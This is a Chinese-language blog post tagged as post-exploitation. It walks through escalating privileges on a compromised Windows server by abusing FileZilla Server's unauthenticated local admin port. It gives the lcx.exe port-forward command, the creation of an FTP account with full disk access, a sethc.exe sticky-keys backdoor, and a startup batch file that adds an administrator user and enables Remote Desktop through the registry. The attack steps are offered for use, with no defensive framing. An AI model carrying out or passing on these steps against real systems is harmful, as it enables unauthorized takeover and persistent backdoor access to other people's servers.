欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

windows提权之——利用第三方软件Filezilla提权

程序员文章站 2022-05-15 20:19:03
...

介绍

FileZilla是一个免费开源的FTP软件,分为客户端版本和服务器版本,具备所有的FTP软件功能。可控性、有条理的界面和管理多站点的简化方式使得Filezilla客户端版成为一个方便高效的FTP客户端工具,而FileZilla Server则是一个小巧并且可靠的支持FTP&SFTP的FTP服务器软件
Filezilla和普通Web网站一样,前台有普通FTP账户执行上传、下载、删除等动作,后台则有一个管理员控制台来设置前台的账户以及账户的权限,前台就是21端口,而后台默认是14147端口

思路

由于14147端口只能本机127.0.0.1访问,所以一般情况是没有密码的,直接非法连接14147端口,非法登录远程的Filezilla,创建一个拥有全部硬盘目录权限的FTP账户

过程

1.菜刀虚拟终端输入tasklist,查看目标系统运行的软件里有FileZilla Server.exe,再输入netstat -ano查看端口,发现开启了21端口和14147端口,但是14147只能由127.0.0.1(目标机自己)访问

windows提权之——利用第三方软件Filezilla提权windows提权之——利用第三方软件Filezilla提权

2.使用lcx.exe进行端口转发,将目标机的14147端口转发到对外开放端口14148
2.1上传lcx.exe到目标机C:\Windows\Temp\

windows提权之——利用第三方软件Filezilla提权
2.2 菜刀虚拟终端输入:上传目录\lcx.exe -tran 对外开放端口 转发的ip 要转发的端口,此时14140端口开启

C:\Windows\Temp\lcx.exe -tran 14140 127.0.0.1 14147

windows提权之——利用第三方软件Filezilla提权

3.在我们自己的电脑上使用FileZilla Server.exe连接目标机的14140端口

windows提权之——利用第三方软件Filezilla提权

4.创建一个拥有全部硬盘目录权限的FTP账户
流程:创建新用户--修改密码--共享C:\所有文件--勾选所有的权限

windows提权之——利用第三方软件Filezilla提权

 

5.使用ftp连接目标机,登陆刚才创建的FTP账号

windows提权之——利用第三方软件Filezilla提权

之后两种方法
方法1:
6.找到Windows/System32/sethc.exe(屏幕粘滞键5次shift弹出),将其改名为cmd.exe

windows提权之——利用第三方软件Filezilla提权
7.之后使用远程桌面连接,按5次shift键,就会弹出cmd窗口
方法2:
6进入Users/Administrator/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/

windows提权之——利用第三方软件Filezilla提权
7.利用开机启动项提权
在该目录上传一个bat文件,内容如下:(创建zs用户,并添加到管理员组,并开启目标机的3389远程端口)

net user zx 123.com /add & net localgroup administrators zx /add & REG ADD HKLMSYSTEMCurrentControlSetControlTerminalServer /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

windows提权之——利用第三方软件Filezilla提权

8.目标服务器再次启动时,1.bat就会执行,zs用户被创建,并添加到了管理员组里

 

相关标签: 后渗透